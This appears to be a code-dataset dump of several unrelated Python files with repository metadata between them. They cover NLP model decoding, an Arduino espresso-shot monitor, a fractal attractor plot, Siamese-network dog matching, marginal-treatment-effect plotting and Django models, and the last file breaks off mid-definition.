span_mask[sample_nr, span_nr] == 0: break new_span_embeddings[sample_nr, span_nr] = top_span_embeddings[sample_nr, top_span_nr] return new_span_embeddings @overrides def decode(self, output_dict: Dict[str, torch.Tensor]): """ Converts the list of spans and predicted antecedent indices into clusters of spans for each element in the batch. Parameters ---------- output_dict : ``Dict[str, torch.Tensor]``, required. The result of calling :func:`forward` on an instance or batch of instances. Returns ------- The same output dictionary, but with an additional ``clusters`` key: clusters : ``List[List[List[Tuple[int, int]]]]`` A nested list, representing, for each instance in the batch, the list of clusters, which are in turn comprised of a list of (start, end) inclusive spans into the original document. """ # TODO(dwadden) which things are already decoded? res = {} if self._loss_weights["coref"] > 0: try : res["coref"] = self._coref.decode(output_dict["coref"]) except : pass if self._loss_weights["ner"] > 0: res["ner"] = self._ner.decode(output_dict["ner"]) if self._loss_weights["relation"] > 0: res["relation"] = self._relation.decode(output_dict["relation"]) if self._loss_weights["events"] > 0: res["events"] = output_dict["events"] return res def get_metrics(self, reset: bool = False) -> Dict[str, float]: """ Get all metrics from all modules. For the ones that shouldn't be displayed, prefix their keys with an underscore. """ metrics_coref = self._coref.get_metrics(reset=reset) metrics_ner = self._ner.get_metrics(reset=reset) metrics_relation = self._relation.get_metrics(reset=reset) metrics_events = self._events.get_metrics(reset=reset) if self._loss_weights["ner"] > 0 and self._loss_weights["events"] > 0: metrics_joint = self._joint_metrics.get_metric(reset=reset) else: metrics_joint = {} # Make sure that there aren't any conflicting names. metric_names = (list(metrics_coref.keys()) + list(metrics_ner.keys()) + list(metrics_relation.keys()) + list(metrics_events.keys())) assert len(set(metric_names)) == len(metric_names) all_metrics = dict(list(metrics_coref.items()) + list(metrics_ner.items()) + list(metrics_relation.items()) + list(metrics_events.items()) + list(metrics_joint.items())) # If no list of desired metrics given, display them all. if self._display_metrics is None: return all_metrics # Otherwise only display the selected ones. res = {} for k, v in all_metrics.items(): if k in self._display_metrics: res[k] = v else: new_k = "_" + k res[new_k] = v return res
3,981
0
53
665c07f5066184b2d353592c7cd71270f8ccbf8a
4,245
py
Python
utils.py
vdumoulin/espresso-shot
b8113b52e8468c659bd762f7d22243269bef3984
[ "MIT" ]
null
null
null
utils.py
vdumoulin/espresso-shot
b8113b52e8468c659bd762f7d22243269bef3984
[ "MIT" ]
null
null
null
utils.py
vdumoulin/espresso-shot
b8113b52e8468c659bd762f7d22243269bef3984
[ "MIT" ]
null
null
null
"""Utility functions.""" import enum import json import struct import subprocess import time import numpy as np # Measurements contain 5 floats (elapsed_time, basket_resistance, # group_resistance, basket_temperature, and group_temperature) and an int # (state, for which 0, 1, 2, and 3 map to START, RUNNING, STOP, and STOPPED, # respectively). FORMAT_STRING = 'fffffi' def compile_and_upload(fqbn, port): """Compiles the Arduino sketch and uploads it to the device. Args: fbqn: str, fully qualified board name. port: str, upload port. """ subprocess.run(['arduino-cli', 'compile', '--fqbn', fqbn, 'espresso-shot']) subprocess.run(['arduino-cli', 'upload', '-p', port, '--fqbn', fqbn, 'espresso-shot']) def find_port_if_not_specified(fqbn, port): """Finds an upload port if it's left unspecified. If `port` is None, then uses `arduino-cli board list` to find all boards connected to the computer with the specified fully qualified board name and sets `port` to that of the first board found. Args: fbqn: str, fully qualified board name. port: str or None, upload port. Returns: port: str, the upload port. Raises: RuntimeError, if `port` is None and no board with the specified fully qualified board name is connected to the computer. """ process = subprocess.Popen( ['arduino-cli', 'board', 'list', '--format', 'json'], stdout=subprocess.PIPE) devices = json.loads(process.communicate()[0].decode('utf-8')) for device in devices: if 'boards' in device and any(board['FQBN'] == fqbn for board in device['boards']): port = port or device['address'] break if port is None: raise RuntimeError('no port specified and no board with the specified ' 'FQBN was found.') return port def read_measurement(serial_port): """Reads a measurement from the serial port. Args: serial_port: Serial, serial port to read from. Returns: tuple of (float, float, float, float, float, int) of form (elapsed_time, basket_resistance, group_resistance, basket_temperature, group_temperature, state). """ return struct.unpack( FORMAT_STRING, serial_port.read(struct.calcsize(FORMAT_STRING))) class MockSerial: """Mock serial port used to test the interface when no device is available. We simulate alternating between pulling a shot for 30 seconds and letting the machine idle for 30 seconds, but we have time run twice as fast for convenience. """
30.106383
79
0.673027
"""Utility functions.""" import enum import json import struct import subprocess import time import numpy as np # Measurements contain 5 floats (elapsed_time, basket_resistance, # group_resistance, basket_temperature, and group_temperature) and an int # (state, for which 0, 1, 2, and 3 map to START, RUNNING, STOP, and STOPPED, # respectively). FORMAT_STRING = 'fffffi' class State(enum.IntEnum): START = 0 RUNNING = 1 STOP = 2 STOPPED = 3 def compile_and_upload(fqbn, port): """Compiles the Arduino sketch and uploads it to the device. Args: fbqn: str, fully qualified board name. port: str, upload port. """ subprocess.run(['arduino-cli', 'compile', '--fqbn', fqbn, 'espresso-shot']) subprocess.run(['arduino-cli', 'upload', '-p', port, '--fqbn', fqbn, 'espresso-shot']) def find_port_if_not_specified(fqbn, port): """Finds an upload port if it's left unspecified. If `port` is None, then uses `arduino-cli board list` to find all boards connected to the computer with the specified fully qualified board name and sets `port` to that of the first board found. Args: fbqn: str, fully qualified board name. port: str or None, upload port. Returns: port: str, the upload port. Raises: RuntimeError, if `port` is None and no board with the specified fully qualified board name is connected to the computer. """ process = subprocess.Popen( ['arduino-cli', 'board', 'list', '--format', 'json'], stdout=subprocess.PIPE) devices = json.loads(process.communicate()[0].decode('utf-8')) for device in devices: if 'boards' in device and any(board['FQBN'] == fqbn for board in device['boards']): port = port or device['address'] break if port is None: raise RuntimeError('no port specified and no board with the specified ' 'FQBN was found.') return port def read_measurement(serial_port): """Reads a measurement from the serial port. Args: serial_port: Serial, serial port to read from. Returns: tuple of (float, float, float, float, float, int) of form (elapsed_time, basket_resistance, group_resistance, basket_temperature, group_temperature, state). """ return struct.unpack( FORMAT_STRING, serial_port.read(struct.calcsize(FORMAT_STRING))) class MockSerial: """Mock serial port used to test the interface when no device is available. We simulate alternating between pulling a shot for 30 seconds and letting the machine idle for 30 seconds, but we have time run twice as fast for convenience. """ def __init__(self, **kwargs): self._time = 0 self._period = 30 self._running = True def read(self, size=1): # One simulated second lasts half a real-time second. time.sleep(0.5) # Sample random basket and group readings. basket_resistance = np.random.normal(loc=10000.0, scale=100.0) group_resistance = np.random.normal(loc=10000.0, scale=100.0) basket_temperature = np.random.normal(loc=92.0, scale=0.5) group_temperature = np.random.normal(loc=92.0, scale=0.5) # The device displays the previous shot's time when the machine is idle. elapsed_time = self._time if self._running else self._period # Determine the device's state. if self._running: # The state is 'START' at the first measurement of a shot, and 'RUNNING' # afterwards. state = State.START if self._time == 0 else State.RUNNING else: # The first measurement at the end of the shot has state 'STOP', and # subsequent measurements have state 'STOPPED'. state = ( State.STOP if (self._time == self._period and self._running) else State.STOPPED) # Advance simulated time by one second, and reset to zero after 30 seconds # has passed. self._time = (self._time + 1) % (self._period + 1) # Switch between "pulling a shot" and "idle" at every cycle. if self._time == 0: self._running = not self._running return struct.pack( 'fffffi', elapsed_time, basket_resistance, group_resistance, basket_temperature, group_temperature, int(state))
1,557
56
73
d63c354c403a2f8213840fefd6b381f385a4e15a
239
py
Python
setup.py
jangroth/gtit-cv
6c912dcd11ced9f6613a36697a99eac86bf6480e
[ "MIT" ]
2
2021-09-27T17:55:54.000Z
2021-11-15T11:43:02.000Z
setup.py
jangroth/git-cv
6c912dcd11ced9f6613a36697a99eac86bf6480e
[ "MIT" ]
null
null
null
setup.py
jangroth/git-cv
6c912dcd11ced9f6613a36697a99eac86bf6480e
[ "MIT" ]
null
null
null
from setuptools import setup, find_packages setup( name="gitcv", version="0.1", packages=find_packages(), author="Jan Groth", license="MIT License", setup_requires=['pytest-runner'], tests_require=['pytest'] )
19.916667
43
0.661088
from setuptools import setup, find_packages setup( name="gitcv", version="0.1", packages=find_packages(), author="Jan Groth", license="MIT License", setup_requires=['pytest-runner'], tests_require=['pytest'] )
0
0
0
a573cae0a3b0113b03c43c3f97dc1f74f8754061
1,653
py
Python
sine_attractors.py
dcxSt/attractors
7df0fc593ca7bc2dbc05d488b1742fc359cf6c7f
[ "MIT" ]
1
2021-11-07T11:56:53.000Z
2021-11-07T11:56:53.000Z
sine_attractors.py
dcxSt/attractors
7df0fc593ca7bc2dbc05d488b1742fc359cf6c7f
[ "MIT" ]
null
null
null
sine_attractors.py
dcxSt/attractors
7df0fc593ca7bc2dbc05d488b1742fc359cf6c7f
[ "MIT" ]
null
null
null
#!/usr/bin/env python # coding: utf-8 # http://paulbourke.net/fractals/clifford/?curius=373 # In[13]: import numpy as np import math as m import matplotlib.pyplot as plt # In[65]: a = -1.5 b = 1.6 c = 1.2 d = 0.7 # In[66]: # In[ ]: # In[77]: sidelength = 8192 center = (sidelength // 2 , sidelength // 2) grid = np.zeros((sidelength,sidelength)) x,y = 0,0 for i in range(30000000): x,y = update(x,y) posx = int(x * sidelength / 5) + center[0] posy = int(y * sidelength / 4) + center[1] if posx < sidelength and posx >= 0 and posy < sidelength and posy >= 0: grid[posx][posy] += 2 else: print(posx, posy) # print(x,y) # In[74]: max(grid.flatten()), max(np.log(grid.flatten() + 1)) # In[88]: lovely_cmaps = ["YlGn","rainbow", "gnuplot2"] for cmap in lovely_cmaps: plt.figure(figsize=(20,20)) plt.imshow(np.log(grid + 1), cmap=cmap) plt.tick_params( axis='both', # changes apply to the x-axis which='both', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False, labelleft=False, left=False, right=False) # labels along the bottom edge are off plt.axis("off") plt.savefig("convergence_orbweaver_{}.png".format(cmap)) print("convergence_orbweaver_{}.png".format(cmap)) plt.show() # In[ ]:
17.967391
75
0.586812
#!/usr/bin/env python # coding: utf-8 # http://paulbourke.net/fractals/clifford/?curius=373 # In[13]: import numpy as np import math as m import matplotlib.pyplot as plt # In[65]: a = -1.5 b = 1.6 c = 1.2 d = 0.7 # In[66]: def update(x,y): # takes floats, returns updated floats xnew = m.sin(a * y) + c * m.cos(a * x) ynew = m.sin(b * x) + d * m.cos(b * y) return xnew, ynew # In[ ]: # In[77]: sidelength = 8192 center = (sidelength // 2 , sidelength // 2) grid = np.zeros((sidelength,sidelength)) x,y = 0,0 for i in range(30000000): x,y = update(x,y) posx = int(x * sidelength / 5) + center[0] posy = int(y * sidelength / 4) + center[1] if posx < sidelength and posx >= 0 and posy < sidelength and posy >= 0: grid[posx][posy] += 2 else: print(posx, posy) # print(x,y) # In[74]: max(grid.flatten()), max(np.log(grid.flatten() + 1)) # In[88]: lovely_cmaps = ["YlGn","rainbow", "gnuplot2"] for cmap in lovely_cmaps: plt.figure(figsize=(20,20)) plt.imshow(np.log(grid + 1), cmap=cmap) plt.tick_params( axis='both', # changes apply to the x-axis which='both', # both major and minor ticks are affected bottom=False, # ticks along the bottom edge are off top=False, # ticks along the top edge are off labelbottom=False, labelleft=False, left=False, right=False) # labels along the bottom edge are off plt.axis("off") plt.savefig("convergence_orbweaver_{}.png".format(cmap)) print("convergence_orbweaver_{}.png".format(cmap)) plt.show() # In[ ]:
146
0
23
0f36567e3c2d414731c0ed12a4624896fc40e0c8
4,105
py
Python
bot.py
MistyScene/AutoForms
e5391e95acfc1aaeae5bec635845203f7ff6b027
[ "MIT" ]
null
null
null
bot.py
MistyScene/AutoForms
e5391e95acfc1aaeae5bec635845203f7ff6b027
[ "MIT" ]
null
null
null
bot.py
MistyScene/AutoForms
e5391e95acfc1aaeae5bec635845203f7ff6b027
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- import discord from discord import Embed from discord.ext import tasks from datetime import datetime import os import requests import random import json TOKEN = os.environ["TOKEN"] client = discord.Client(intents=discord.Intents.all()) # 次回送信予定時刻を06:00-8:30までの間でランダムに設定 time_set = setting_time_set() # 起動時に初回の次回送信時刻を設定 tem_set = set_tem() # Embedの関数 @client.event @client.event @tasks.loop(seconds=60) loop.start() client.run(TOKEN)
34.208333
120
0.625335
# -*- coding: utf-8 -*- import discord from discord import Embed from discord.ext import tasks from datetime import datetime import os import requests import random import json TOKEN = os.environ["TOKEN"] client = discord.Client(intents=discord.Intents.all()) # 次回送信予定時刻を06:00-8:30までの間でランダムに設定 def setting_time_set(): setting_time_h = random.randint(6, 8) if setting_time_h == 8: setting_time_m = random.randint(0, 30) else: setting_time_m = random.randint(0, 59) setting_time = f"{setting_time_h:02}:{setting_time_m:02}" return setting_time def set_tem(): choice_list = ["36.4", "36.5", "36.6"] choice_ans = random.choice(choice_list) # 36.4-36.6までの間でランダムに選択 return choice_ans time_set = setting_time_set() # 起動時に初回の次回送信時刻を設定 tem_set = set_tem() # Embedの関数 async def template_embed(message, title, name_1, name_2, value_1, color, description=None): ch = client.get_channel(message) embed_time = datetime.now().strftime("%Y年%m月%d日-%H:%M") embed = Embed(title=title, description=description, color=color) embed.add_field(name=name_1, value=f"{value_1}", inline=True) embed.add_field(name=name_2, value=f"{tem_set}", inline=True) embed.set_footer(text=f"{embed_time}") await ch.send("<@343956207754805251>") await ch.send(embed=embed) @client.event async def on_ready(): await template_embed(message=768274673984208926, title="起動ログ", name_1="次回の送信予定時刻", value_1=time_set, name_2="送信予定の体温", color=discord.Color.orange()) @client.event async def on_message(message): if message.content == "/reset": await reset(message) if message.content == "/now": await now(message) async def reset(message): global time_set global tem_set time_set = setting_time_set() tem_set = set_tem() await template_embed(message=768274673984208926, title="リセットされました", name_1="次回の送信予定時刻", name_2="送信予定の体温", value_1=time_set, color=discord.Color.purple()) await template_embed(message=message.channel.id, title="リセットされました", name_1="次回の送信予定時刻", name_2="送信予定の体温", value_1=time_set, color=discord.Color.purple()) async def now(message): await template_embed(message=message.channel.id, title="現在の状況", name_1="次回の送信予定時刻", name_2="送信予定の体温", value_1=time_set, color=discord.Color.greyple()) @tasks.loop(seconds=60) async def loop(): global time_set global tem_set now_t = datetime.now().strftime('%H:%M') print(f"現在の時刻:{now_t}/送信予定時刻:{time_set}/送信予定体温:{tem_set}") if now_t == time_set: # 送信予定時刻になった? dt_now = datetime.now().strftime("%Y-%m-%d") # 現在時刻を2020-01-01の形で取得、dt_nowに格納 file_name = "cfg.json" with open(file_name, "r", encoding="utf-8")as f: cfg = json.load(f) cfg["output"]["ans_1"] = f"{dt_now}" cfg["output"]["ans_4"] = f"{tem_set}" params = {"entry.{}".format(cfg["entry"][k]): cfg["output"][k] for k in cfg["entry"].keys()} res = requests.get(cfg["form_url"] + "formResponse", params=params) if res.status_code == 200: await template_embed(message=768274673984208926, title="ログ情報", description=f"[URL]({res.url})", name_1="完了状態", name_2="送信された体温", value_1="成功しました", color=discord.Color.green()) else: res.raise_for_status() await template_embed(message=768274673984208926, title="ログ情報", name_1="完了状態", name_2="送信予定だった体温", value_1="エラーが発生しました。", color=discord.Color.red()) else: if now_t == "21:00": time_set = setting_time_set() tem_set = set_tem() await template_embed(message=768274673984208926, title="送信時刻更新のお知らせ", name_1="次回の送信予定時刻", name_2="送信予定の体温", value_1=time_set, color=discord.Color.blue()) loop.start() client.run(TOKEN)
3,883
0
190
5609448a8b557b5dc9ac459a5689d4f1819a5e51
4,141
py
Python
exam.py
mfshiu/dog-siamese
3e9077f2231d9cc9ac8eea5ac246901d2d5e6729
[ "MIT" ]
null
null
null
exam.py
mfshiu/dog-siamese
3e9077f2231d9cc9ac8eea5ac246901d2d5e6729
[ "MIT" ]
null
null
null
exam.py
mfshiu/dog-siamese
3e9077f2231d9cc9ac8eea5ac246901d2d5e6729
[ "MIT" ]
null
null
null
import os import sys import torch from config import Config from train3 import image_size from model import SiameseNetwork from evaluate3 import TestDataset from torch.utils.data import DataLoader use_gpu = False register_dir = "./data/ct0202a/" threshold = 50 siam_model = None log_lines = [] ## if __name__ == '__main__': register_dir = Config.register_dir dog_id = None dog_img = None exam_dir = None model_path = "./trained/DogSiamese-2.pkl" for a in sys.argv[1:]: if a.lower() == 'gpu': use_gpu = True else: aa = a.split("=") if "dog" == aa[0]: dog_id = aa[1] elif "img" == aa[0]: dog_img = aa[1] elif "exam_dir" == aa[0]: exam_dir = aa[1] elif "model" == aa[0]: model_path = aa[1] else: register_dir = a print('Use gpu:', use_gpu) print('Register dir:', register_dir) print('Dog ID to be checked:', dog_id) print('Dog image to check:', dog_img) if use_gpu: siam_model = SiameseNetwork(image_size).cuda() siam_model.load_state_dict(torch.load(model_path, map_location=torch.device('cuda:0'))) else: siam_model = SiameseNetwork(image_size).cpu() siam_model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu'))) siam_model.eval() if exam_dir: img_paths = [] sum_lines = [] for path, subdirs, files in os.walk(exam_dir): for name in files: img_paths.append(os.path.join(path, name)) img_paths.sort() for i, img in enumerate(img_paths): find_id, similarity = find_dog(img) if find_id: line = "%s = %s (%s)" % (img_paths[i], find_id, similarity) else: line = "%s = None" % (img_paths[i],) sum_lines.append("%s\n" % (line,)) print(line) elif dog_id: is_same = exam_dog(dog_id, dog_img)[0] if is_same: print("Yes, The dog is %s." % (dog_id,)) else: print("No, The dog is not %s." % (dog_id,)) else: find_id, similarity = find_dog(dog_img) if find_id: print("The dog is %s, similarity is %s" % (find_id, similarity)) else: print("Cannot find the dog.") with open("exam.log", "w") as fp: fp.writelines(sum_lines) fp.writelines("\nDetails ==================\n") fp.writelines(log_lines)
31.853846
99
0.581744
import os import sys import torch from config import Config from train3 import image_size from model import SiameseNetwork from evaluate3 import TestDataset from torch.utils.data import DataLoader use_gpu = False register_dir = "./data/ct0202a/" threshold = 50 siam_model = None log_lines = [] ## def exam_dog(dog_id, img_path): exam_count = Config.exam_count dog_dir = os.path.join(register_dir, dog_id) walked = [x for x in os.walk(dog_dir)][0] dog_paths = [os.path.join(walked[0], x) for x in walked[2]] dog_paths.sort() similarities = [] test_set = TestDataset(img_path, dog_paths[0: min(len(dog_paths), exam_count + 1)]) test_dataloader = DataLoader(test_set, shuffle=False, batch_size=1, num_workers=0) for i, data in enumerate(test_dataloader): img0, img1 = data if use_gpu: similarity = siam_model.evaluate(img0.cuda(), img1.cuda()) else: similarity = siam_model.evaluate(img0.cpu(), img1.cpu()) similarities.append(similarity) is_same = len([x for x in similarities if x > threshold]) > exam_count // 2 return is_same, similarities def find_dog(img_path): walked = [x for x in os.walk(register_dir)][0] dog_ids = walked[1] dog_ids.sort() max_avg = 0 hit_dog = None for dog_id in dog_ids: similarities = exam_dog(dog_id, img_path)[1] similarities.sort() avg = sum(similarities) / len(similarities) # avg = sum(similarities[Config.exam_count//2:]) / (len(similarities)-Config.exam_count//2) # avg = sum(x**2 for x in similarities)**0.5 # avg = max(similarities[]) log_lines.append("%s->%s(avg:%s,%s)\n" % (img_path, dog_id, avg, similarities)) if avg > threshold and max_avg < avg: max_avg = avg hit_dog = dog_id return hit_dog, max_avg if __name__ == '__main__': register_dir = Config.register_dir dog_id = None dog_img = None exam_dir = None model_path = "./trained/DogSiamese-2.pkl" for a in sys.argv[1:]: if a.lower() == 'gpu': use_gpu = True else: aa = a.split("=") if "dog" == aa[0]: dog_id = aa[1] elif "img" == aa[0]: dog_img = aa[1] elif "exam_dir" == aa[0]: exam_dir = aa[1] elif "model" == aa[0]: model_path = aa[1] else: register_dir = a print('Use gpu:', use_gpu) print('Register dir:', register_dir) print('Dog ID to be checked:', dog_id) print('Dog image to check:', dog_img) if use_gpu: siam_model = SiameseNetwork(image_size).cuda() siam_model.load_state_dict(torch.load(model_path, map_location=torch.device('cuda:0'))) else: siam_model = SiameseNetwork(image_size).cpu() siam_model.load_state_dict(torch.load(model_path, map_location=torch.device('cpu'))) siam_model.eval() if exam_dir: img_paths = [] sum_lines = [] for path, subdirs, files in os.walk(exam_dir): for name in files: img_paths.append(os.path.join(path, name)) img_paths.sort() for i, img in enumerate(img_paths): find_id, similarity = find_dog(img) if find_id: line = "%s = %s (%s)" % (img_paths[i], find_id, similarity) else: line = "%s = None" % (img_paths[i],) sum_lines.append("%s\n" % (line,)) print(line) elif dog_id: is_same = exam_dog(dog_id, dog_img)[0] if is_same: print("Yes, The dog is %s." % (dog_id,)) else: print("No, The dog is not %s." % (dog_id,)) else: find_id, similarity = find_dog(dog_img) if find_id: print("The dog is %s, similarity is %s" % (find_id, similarity)) else: print("Cannot find the dog.") with open("exam.log", "w") as fp: fp.writelines(sum_lines) fp.writelines("\nDetails ==================\n") fp.writelines(log_lines)
1,523
0
46
e460f5ef73e060f6a64ca12aa77375e312b5b1cf
3,974
py
Python
auxiliary/auxiliary.py
burakbalaban/student-project-burakbalaban
1b58ab1896e65937c16d9f5b4ff1a8bddc2d2db7
[ "MIT" ]
null
null
null
auxiliary/auxiliary.py
burakbalaban/student-project-burakbalaban
1b58ab1896e65937c16d9f5b4ff1a8bddc2d2db7
[ "MIT" ]
null
null
null
auxiliary/auxiliary.py
burakbalaban/student-project-burakbalaban
1b58ab1896e65937c16d9f5b4ff1a8bddc2d2db7
[ "MIT" ]
null
null
null
"""This module contains auxiliary function which we use in the example notebook.""" import json import matplotlib.patches as mpatches import matplotlib.pyplot as plt from scipy.stats import norm import pandas as pd import numpy as np from grmpy.estimate.estimate_output import calculate_mte from grmpy.read.read import read def process_data(df, output_file): """This function adds squared and interaction terms to the Cainero data set.""" # Delete redundant columns\n", for key_ in ['newid', 'caseid']: del df[key_] # Add squared terms for key_ in ['mhgc', 'cafqt', 'avurate', 'lurate_17', 'numsibs', 'lavlocwage17']: str_ = key_ + 'sq' df[str_] = df[key_] ** 2 # Add interaction terms for j in ['pub4', 'lwage5_17', 'lurate_17', 'tuit4c']: for i in ['cafqt', 'mhgc', 'numsibs']: df[j + i] = df[j] * df[i] df.to_pickle(output_file + '.pkl') def plot_est_mte(rslt, file): """This function calculates the marginal treatment effect for different quartiles of the unobservable V. ased on the calculation results.""" init_dict = read(file) data_frame = pd.read_pickle(init_dict['ESTIMATION']['file']) # Define the Quantiles and read in the original results quantiles = [0.0001] + np.arange(0.01, 1., 0.01).tolist() + [0.9999] mte_ = json.load(open('data/mte_original.json', 'r')) mte_original = mte_[1] mte_original_d = mte_[0] mte_original_u = mte_[2] # Calculate the MTE and confidence intervals mte = calculate_mte(rslt, init_dict, data_frame, quantiles) mte = [i / 4 for i in mte] mte_up, mte_d = calculate_cof_int(rslt, init_dict, data_frame, mte, quantiles) # Plot both curves ax = plt.figure(figsize=(17.5, 10)).add_subplot(111) ax.set_ylabel(r"$B^{MTE}$", fontsize=24) ax.set_xlabel("$u_D$", fontsize=24) ax.tick_params(axis='both', which='major', labelsize=18) ax.plot(quantiles, mte, label='grmpy $B^{MTE}$', color='blue', linewidth=4) ax.plot(quantiles, mte_up, color='blue', linestyle=':', linewidth=3) ax.plot(quantiles, mte_d, color='blue', linestyle=':', linewidth=3) ax.plot(quantiles, mte_original, label='original$B^{MTE}$', color='orange', linewidth=4) ax.plot(quantiles, mte_original_d, color='orange', linestyle=':',linewidth=3) ax.plot(quantiles, mte_original_u, color='orange', linestyle=':', linewidth=3) ax.set_ylim([-0.41, 0.51]) ax.set_xlim([-0.005, 1.005]) blue_patch = mpatches.Patch(color='blue', label='original $B^{MTE}$') orange_patch = mpatches.Patch(color='orange', label='grmpy $B^{MTE}$') plt.legend(handles=[blue_patch, orange_patch],prop={'size': 16}) plt.show() return mte def calculate_cof_int(rslt, init_dict, data_frame, mte, quantiles): """This function calculates the confidence interval of the marginal treatment effect.""" # Import parameters and inverse hessian matrix hess_inv = rslt['AUX']['hess_inv'] / data_frame.shape[0] params = rslt['AUX']['x_internal'] # Distribute parameters dist_cov = hess_inv[-4:, -4:] param_cov = hess_inv[:46, :46] dist_gradients = np.array([params[-4], params[-3], params[-2], params[-1]]) # Process data covariates = init_dict['TREATED']['order'] x = np.mean(data_frame[covariates]).tolist() x_neg = [-i for i in x] x += x_neg x = np.array(x) # Create auxiliary parameters part1 = np.dot(x, np.dot(param_cov, x)) part2 = np.dot(dist_gradients, np.dot(dist_cov, dist_gradients)) # Prepare two lists for storing the values mte_up = [] mte_d = [] # Combine all auxiliary parameters and calculate the confidence intervals for counter, i in enumerate(quantiles): value = part2 * (norm.ppf(i)) ** 2 aux = np.sqrt(part1 + value) / 4 mte_up += [mte[counter] + norm.ppf(0.95) * aux] mte_d += [mte[counter] - norm.ppf(0.95) * aux] return mte_up, mte_d
36.458716
92
0.657776
"""This module contains auxiliary function which we use in the example notebook.""" import json import matplotlib.patches as mpatches import matplotlib.pyplot as plt from scipy.stats import norm import pandas as pd import numpy as np from grmpy.estimate.estimate_output import calculate_mte from grmpy.read.read import read def process_data(df, output_file): """This function adds squared and interaction terms to the Cainero data set.""" # Delete redundant columns\n", for key_ in ['newid', 'caseid']: del df[key_] # Add squared terms for key_ in ['mhgc', 'cafqt', 'avurate', 'lurate_17', 'numsibs', 'lavlocwage17']: str_ = key_ + 'sq' df[str_] = df[key_] ** 2 # Add interaction terms for j in ['pub4', 'lwage5_17', 'lurate_17', 'tuit4c']: for i in ['cafqt', 'mhgc', 'numsibs']: df[j + i] = df[j] * df[i] df.to_pickle(output_file + '.pkl') def plot_est_mte(rslt, file): """This function calculates the marginal treatment effect for different quartiles of the unobservable V. ased on the calculation results.""" init_dict = read(file) data_frame = pd.read_pickle(init_dict['ESTIMATION']['file']) # Define the Quantiles and read in the original results quantiles = [0.0001] + np.arange(0.01, 1., 0.01).tolist() + [0.9999] mte_ = json.load(open('data/mte_original.json', 'r')) mte_original = mte_[1] mte_original_d = mte_[0] mte_original_u = mte_[2] # Calculate the MTE and confidence intervals mte = calculate_mte(rslt, init_dict, data_frame, quantiles) mte = [i / 4 for i in mte] mte_up, mte_d = calculate_cof_int(rslt, init_dict, data_frame, mte, quantiles) # Plot both curves ax = plt.figure(figsize=(17.5, 10)).add_subplot(111) ax.set_ylabel(r"$B^{MTE}$", fontsize=24) ax.set_xlabel("$u_D$", fontsize=24) ax.tick_params(axis='both', which='major', labelsize=18) ax.plot(quantiles, mte, label='grmpy $B^{MTE}$', color='blue', linewidth=4) ax.plot(quantiles, mte_up, color='blue', linestyle=':', linewidth=3) ax.plot(quantiles, mte_d, color='blue', linestyle=':', linewidth=3) ax.plot(quantiles, mte_original, label='original$B^{MTE}$', color='orange', linewidth=4) ax.plot(quantiles, mte_original_d, color='orange', linestyle=':',linewidth=3) ax.plot(quantiles, mte_original_u, color='orange', linestyle=':', linewidth=3) ax.set_ylim([-0.41, 0.51]) ax.set_xlim([-0.005, 1.005]) blue_patch = mpatches.Patch(color='blue', label='original $B^{MTE}$') orange_patch = mpatches.Patch(color='orange', label='grmpy $B^{MTE}$') plt.legend(handles=[blue_patch, orange_patch],prop={'size': 16}) plt.show() return mte def calculate_cof_int(rslt, init_dict, data_frame, mte, quantiles): """This function calculates the confidence interval of the marginal treatment effect.""" # Import parameters and inverse hessian matrix hess_inv = rslt['AUX']['hess_inv'] / data_frame.shape[0] params = rslt['AUX']['x_internal'] # Distribute parameters dist_cov = hess_inv[-4:, -4:] param_cov = hess_inv[:46, :46] dist_gradients = np.array([params[-4], params[-3], params[-2], params[-1]]) # Process data covariates = init_dict['TREATED']['order'] x = np.mean(data_frame[covariates]).tolist() x_neg = [-i for i in x] x += x_neg x = np.array(x) # Create auxiliary parameters part1 = np.dot(x, np.dot(param_cov, x)) part2 = np.dot(dist_gradients, np.dot(dist_cov, dist_gradients)) # Prepare two lists for storing the values mte_up = [] mte_d = [] # Combine all auxiliary parameters and calculate the confidence intervals for counter, i in enumerate(quantiles): value = part2 * (norm.ppf(i)) ** 2 aux = np.sqrt(part1 + value) / 4 mte_up += [mte[counter] + norm.ppf(0.95) * aux] mte_d += [mte[counter] - norm.ppf(0.95) * aux] return mte_up, mte_d
0
0
0
375be2219b434f699514d5dfd0f487eacc8beb7f
8,132
py
Python
dataentry/models.py
louisdijkstra/kumbhmela-metadata
59c6f22d0d5b307617ff03e3700c089f209788bf
[ "MIT" ]
null
null
null
dataentry/models.py
louisdijkstra/kumbhmela-metadata
59c6f22d0d5b307617ff03e3700c089f209788bf
[ "MIT" ]
null
null
null
dataentry/models.py
louisdijkstra/kumbhmela-metadata
59c6f22d0d5b307617ff03e3700c089f209788bf
[ "MIT" ]
null
null
null
from django.db import models from django.utils.encoding import python_2_unicode_compatible """ Contains the models/tables for the kumbhmela_db.sqlite3 database. Every field has (when necessary) a 'help_text' that explains the meaning of the field. """ __author__ = "Louis Dijkstra" @python_2_unicode_compatible class Drive(models.Model): """ Table/model to represent (a collection of) drive(s). """ label = models.CharField(max_length=50, help_text="Label added to the drive, e.g., 'kumbhmela_5'.") external = models.BooleanField(default=False, help_text="True when the drive is external and false otherwise.") time_added = models.DateTimeField(blank=True, null=True, help_text="Time when the drive was added to the drive bay.") time_removed = models.DateTimeField(blank=True, null=True, help_text="Time when the drive was removed from the drive bay.") whereabouts = models.TextField(max_length=1000, blank=True, help_text="Whereabouts of this drive copy, e.g., who had it lasts, where is it now etc. (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this (collection of) drive(s) (optional).") @python_2_unicode_compatible class DriveCopy(models.Model): """ Every Drive might have several copies. This table/model is used to keep track of them. """ drive = models.ForeignKey(Drive, on_delete=models.CASCADE, help_text="The unique drive it is a copy of.") label = models.CharField(max_length=50, help_text="Label added to the drive, e.g., 'kumbhmela_5II'.") number = models.IntegerField(help_text="Drive copy number.") whereabouts = models.TextField(max_length=1000, blank=True, help_text="Whereabouts of this drive copy, e.g., who had it lasts, where is it now etc. (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Additional notes on this drive copy (optional).") @python_2_unicode_compatible class Person(models.Model): """ Table/Model to represent a person """ name = models.CharField(max_length=100, help_text="First and last name.") email = models.CharField(max_length=200, blank=True, help_text="Email address(es) (optional).") note = models.TextField(max_length=1000, blank=True, help_text="Notes (optional).") @python_2_unicode_compatible class Experiment(models.Model): """ Table/Model to represent the various subexperiments """ # every experiment is linked to a contact person contactperson = 